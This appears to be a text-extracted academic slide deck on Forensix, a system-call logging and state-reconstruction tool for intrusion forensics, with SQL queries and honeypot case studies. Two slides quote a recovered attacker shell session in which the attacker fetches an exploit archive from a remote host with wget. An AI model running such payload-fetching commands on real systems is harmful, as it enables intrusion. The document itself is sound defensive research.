Title: Intrusion Analysis by Reconstructing System State
1Intrusion Analysis by Reconstructing System State
- Ashvin Goel
- University of Toronto
- Joint work with
- Kenneth Po, Kamran Farhadi
- Wu-chang Feng and the
- Forensix group at PSU
2Motivation
- Nothing is certain but death, taxes, and 0wned
machines - Exploits in software, security policies, policy
enforcement - Compromised accounts
- Employees gone bad
- Sometimes, you need to quickly find out exactly
what happened on a system - Current forensic techniques inadequate
- Incomplete audit information
- Reconstruction process is manual and error-prone
3The Forensix approach
- Record all system activity, automate replay
- Computer TiVo
- Enable fast and accurate forensic analysis of
compromised machine - What about the costs?
- Forensic investigator time is expensive
- Computing and storage resources are cheap and
plentiful - 40 6 month replay log (small web server)
- 10-20 performance degradation
- Cost proposition becomes more favorable every day
4Issues
- Auditing accuracy (Races and proper event
attribution) - Page cache auditing to disambiguate write() races
- Permeating attribution throughout kernel
- Auditing overhead
- Elimination of full read() logging
- Batching and other kernel optimizations
- Webstone benchmark gt 20 degradation
- Reconstruction queries for intrusion analysis
5Intrusion Analysis
- Helps understand cause of attack
- After intrusion detection phase
- Helps minimize after-effects of intrusions
- Allows accurate assessment of extent of damage
- Retrieval of uncorrupted data
- Retrieval of attack code
- Replay of system activities related to attack
- Restarting services as soon as possible
- Helps determine attack signatures
- Can improve intrusion detection process
6Analysis Requirements
- Complete - analysis of all intrusions
- Predictable - analysis shouldn't disturb evidence
- Flexible - comprehensive views of system state
- Replay bug - reconstruct specific activities
- Dependency - express relations between activities
- Real-time - iterative process
- Performance - low overhead
7Complete Analysis
- Capture system call activity
- Host intrusions must manipulate processes, files
- Requires making system calls
- Assumptions
- Kernel is not compromised
- Disable writes to kernel memory
8Forensix architecture
9Public network
Forensix Architecture
Application Server
Target System
Operating System
Authenticated System-Call Logging Facility
Provides complete, authenticated service
Private network
Logging Pinhole
Append-Only Files
Backend Storage System
Batched Record Processing
Database Backend
Forensic Analysis
- System-call data analyzed on backend system
- Provides completeness and predictability
10Flexibility?
- System call data is too low level
- Deals with kernel entities (FDs, PIDs)
- Gives state change information
- Humans are interested in user-visible system
state - User-level entities (files, process names)
- Need system state information at a given
time/interval - Reconstruction is linear, complicated and slow
- System semantics are complicated
- Process identifier can have different names
(e.g., execve) - File descriptor can have different names (e.g.,
close, dup) - Analysis tools are hard to write and slow
11Example 1
- User query
- List all processes that existed in the last hour
- Query over raw audit data
- Process all fork and wait audit events to
determine lifetimes of each process on the system - Select those processes that existed in the last
hour - Improvement
- Time-indexed process table
12Example 2
- Suspected ptrace-execve race that created a new
setuid binary yesterday - User query
- Compare setuid root binaries of today to a few
days ago - Find files with ownerO and permissionP at timeT
13Example 2
- Query over raw audit data
- Find all files owned by O at time T
- For each file created (mkdir, mknod, create,
symlink), find last event (chown) before T that
set owner to O - Remove files that were deleted before T (rmdir,
unlink) - Find all files with permission P at time T
- For each file created (mkdir, mknod, create,
symlink), find last event (chmod) before T that
set permission to P - Remove files that were deleted before T (rmdir,
unlink) - Return intersection of above two queries
- Problem
- All events must be examined (only last one
matters)
14Example 3
- Suspected rootkit (rkid.tar.gz) and local root
exploit (xpl.tar.gz) packages installed on
machine at some point in time - Unpack into directories named rkid and xpl
- User query
- Find the contents of directoryD at timeT
- Query over raw audit data
- Find each file created (mkdir, mknod, create,
symlink, link), updated (rename), or removed
(rmdir, unlink) from directoryD before timeT - Problem (same as Example 2, replay all events)
15Other examples
- Tracking modifications to /etc/passwd
- Find the path name of a file whose inodeI at
timeT - Return all modifications done on inodeI
- Privelege escalations
- Find processes whose effective user idE between
Ts and Te
16Reconstructing System State
17System State Mappings
- Map kernel entities to user-visible system state
- Track changes to this mapping over time
- Table of object and attribute lifetimes
- Allows analysis tools to reuse reconstructed
state - Mappings constructed upon audit insertion to
backend database - Lifetimes stored in interval tables
18Interval Tables
19Interval tables
- Each table has ID, begin and end time
- Complexity of system semantics interpreted when
mappings are constructed - Analysis queries written in SQL
- Without iteration or recursion
- Easier optimization of queries
20Constructing Mappings
- Mappings are constructed for a time interval
- Need at least two queries
- New rows created with begin time
- Update current rows with end time
- Construction is idempotent
- Allows overlapping construction, deletion,
recreation - Reconstruction must be in time order
21Mapping Issues
- Each kernel entity should be unique
- PID, INODE have to be unique
- PID
- Add generation number during backend processing
- Generation number initialized to current time
- INODE
- Persistent generation number available from file
system - Generation number is incremented when inode is
reused
22Example 2 revisited
- Find files with ownerO and permissionP at
timeT - SELECT f.inode
- FROM file_owner f
- WHERE f.owner O AND f.permission P
- AND T BETWEEN (f.ts, f.te)
23Example 3 revisited
- Find the contents of directoryD at timeT
- SELECT i.file_name
- FROM inode i
- WHERE i.parent_inode D
- AND T BETWEEN (i.ts, i.te)
24Analysis Tools
25Types of Tools
- File-Access Tracker
- Shows files accessed or modified in a time
interval - IO Tracker
- Replays IO performed by processes
- Reconstructs contents of files and directories
- Dependency Tracker
- Displays dependencies between processes and files
26File-Access Tracker
- General query to display access or modification
times of files - Uses two queries
- Calls that use paths (rename, unlink, etc.)
- Calls that use file descriptors
- Shows all names of accessed or modified files
- Hard links, removes, renames, etc.
- Filtering to limit results
- Event type (i.e. create, open), time interval,
last access, file names, file attributes, process
names, process attributes - Implemented via a join of interval tables and
underlying Forensix tables
27SELECT i.inode, max(e.time) FROM event e,
fd_mapping f, inode_mapping i WHERE e.syscall in
(read, write, fchown,
fchmod, truncate) AND f.pid e.pid AND
f.fd e.fd AND f.i_id i.id AND e.time
BETWEEN f.begintime AND f.endtime AND e.time
BETWEEN starttime AND finishtime GROUP BY
i.inode
SQL code for finding files modified via file
descriptors
28IO Tracker
- Process IO tracker
- List all I/O of a process
- Useful for recreating shell session (w/
descendants) - Use process interval table to get PID given a
name - Use inode interval table to get inode of terminal
- File IO tracker
- List all I/O for a file
- Useful for reconstructing access to and
modification of files - Use inode interval table to get inode of file
29Process IO Tracker
INSERT INTO tmp_event (id, time) SELECT e.id,
e.time FROM event e, fd_mapping f, tmp_pid p,
inode_mapping i WHERE e.syscall in (write)
AND f.pid e.pid AND f.pid p.pid AND
f.fd e.fd AND f.i_id i.id AND e.time
BETWEEN f.begintime AND f.endtime AND i.path
path (e.g., /dev/pts0) SELECT data FROM io,
tmp_event e WHERE io.parent e.id ORDER BY
e.time
- Find descendants of PID
- to track user sessions
30File IO Tracker
- File tracker
- Similar to process IO tracker, but with inode
instead of PID - Obtains inode at recreation time
- Recreates opens, writes, seeks and truncates
- Does not currently track memory-mapped writes
31Directory Tracker
- List paths in inode interval table with prefix
that matches directory - See example 3
32Dependency Tracker
- Used to determine contamination of system by
malicious activity - Process to process dependencies
- Fork or execve
- File to process dependencies
- Process reads from file
- Process to File dependencies
- Process writes to file
- File to file dependencies (bidirectional)
- Two file names refer to same file (link, chroot)
33Backward and Forward Tracking
- Need one or more detection points
- Backward tracking
- Shows sequence of states that lead to a detection
point - Forward tracking
- Shows sequence of states affected by a detection
point - Needs filters for additional pruning
34Evaluation
35Setup
- Honeypot system
- Redhat 7.1 (seawolf) distribution
- Vulnerabilities
- Httpd with SSL
- Wu-ftpd
- Sendmail
- Ptrace
- 2600 AMD Athlon frontend
- Intel Pentium 2.4 GHz backend, 512 MB, 120 GB
36FTP intrusion 1Files Modified Daily
37Analysis of FTP Intrusion 1
- /bin 1 /bin/netstat 05-17 155417
- /etc 28 /etc/passwd 05-17 155204
- /etc/group 05-17 155129
- ...
- /ftp 1773
- /home 6
- /incoming 3
- /root 1 /root/.bash_history 05-17 164325
- /sbin 1 /sbin/ifconfig 05-17 155418
- /spool 5
- /tmp 328
- /var 29
- /usr 3 /usr/bin/killall 05-17 155422
- /usr/bin/chfn 05-17 160414
- /usr/bin/chsh 05-17 160604
Files modified by root, grouped by directory
38FTP intrusion 2
39Analysis of FTP intrusion 2
- /bin 74 /bin/kill 05-12 171158
- /bin/ps 05-12 171146
- /dev 3
- /etc 84 /etc/passwd 05-12 171120
- /home 11
- /lib 588
- /root 3 /root/.bash_history 05-12 184032
- /sbin 175 /sbin/ldconfig 05-12 171209
- /tmp 26
- /var 452
- /usr 26 /usr/bin/killall 05-12 171146
Files modified by root, grouped by directory
40FTP intrusion 2 analysis
41Overhead (Busiest Day)
42Performance Under Heavy Load
- Storage needs under heavy load
- 8-10 GB per day
- Mapping tables can be purged and recreated
43Related Work
- System call monitoring
- USTAT uses state transitions to detect
intrusions - Tripwire, Coroner's Toolkit, Sleuth Kit
- Detects file modifications
- Recovers deleted files from unallocated disk
blocks - Sebek
- Captures write calls to replay attacker's
keystrokes - ReVirt, Backtracker
- LIDS
- Secure front-end operation
- Elephant file system
- Provides file system snapshots
44Conclusions
- Empower the user when system is compromised
- Provide a complete picture of the extent of
damage - Retrieve uncorrupted data
- Provide hints to harden system
- Implement tools to allow analysis of large data
- Create mappings
- Between kernel entities and user-visible state
- Simplifies tools
- Allows intrusion analysis in near real-time
45Current status
- Project page
- http//syn.cs.pdx.edu/projects/4N6
- Source code availability
- http//forensix.sourceforge.net
- Sample queries
- Replay Shell (demo), Process Tree, Privilege
Escalation
46Future Work
- Reduce mapping time
- Reduce/filter the amount of data collected
- Apply tools for intrusion detection
47Future work
- Incorporating functionality from other forensic
tools - Full audit trail allows Forensix to superset
other tools - Selective undo
- Back to the Future
- Automate system restoration
48Example of Mapping Construction
/ Create new row. Fill begin time / INSERT
IGNORE INTO inode_mapping (inode, path, type,
begintime) SELECT p.inode, p.dst_path, p.type,
e.time FROM event e, path p WHERE e.id
p.parent AND e.syscall IN (mknod, mkdir, link,
rename, symlink) AND e.returncode gt 0 AND
e.time BETWEEN mapping_starttime AND
mapping_finishtime / Update end time / UPDATE
inode_mapping i, event e, path p SET i.endtime
e.time WHERE e.id p.parent AND e.syscall IN
(unlink, rename, rmdir) AND i.inode
p.inode AND i.path p.src_path AND
i.endtime IS NULL AND e.returncode gt 0 AND
e.time BETWEEN mapping_starttime AND
mapping_finishtime
49Issues With Constructing Mappings
- Exit and close can be implicit
- E.g., process killed by signal
- Examine status of parent's wait system call
- Allows building queries based on signal
information - State of currently running processes not known
- Open file descriptors
- Files currently on system
- Vfork seen after process starts executing
- Inode number obtained before or after system call
- Race condition
- Remotely mounted files
- Inode numbers are not unique
50Backward Trackingthe SSL Intrusion
51Forward Trackingthe SSL Intrusion
Login
Editing source file
Man page - chfn
Compiling second attack
52Analysis of SSL Intrusion
- connected using addr 0xbffff7dc - overflow?
- bash-2.04 cd /var/tmp
- bash-2.04 wget http//pub.inter.net/xpl.tgz
- --123242-- http//pub.inter.net/xpl.tgz
- gt xpl.tgz'
- Connecting to pub.inter.net80...
- public.inter.net Host not found.
- bash-2.04 ftp -v XXX.XXX.XXX.XXX
53IO Tracking the SSL Intrusion
- connected using addr 0xbffff7dc - overflow?
- bash-2.04 cd /var/tmp
- bash-2.04 wget http//pub.inter.net/xpl.tgz
- --123242-- http//pub.inter.net/xpl.tgz
- gt xpl.tgz'
- Connecting to pub.inter.net80...
- public.inter.net Host not found.
- bash-2.04 ftp -v XXX.XXX.XXX.XXX
54Ftpd Attack Analysis
55SSL Attack Analysis
56Bug Fixes
- Direct delivery from kernel to backend
- Tricky implementation
- 1-2 copies
- Removing forensix module works now
- Race between processes using the module and
module being removed - Removed auto increment in event table
- Comma fixes for loading
- Vfork fix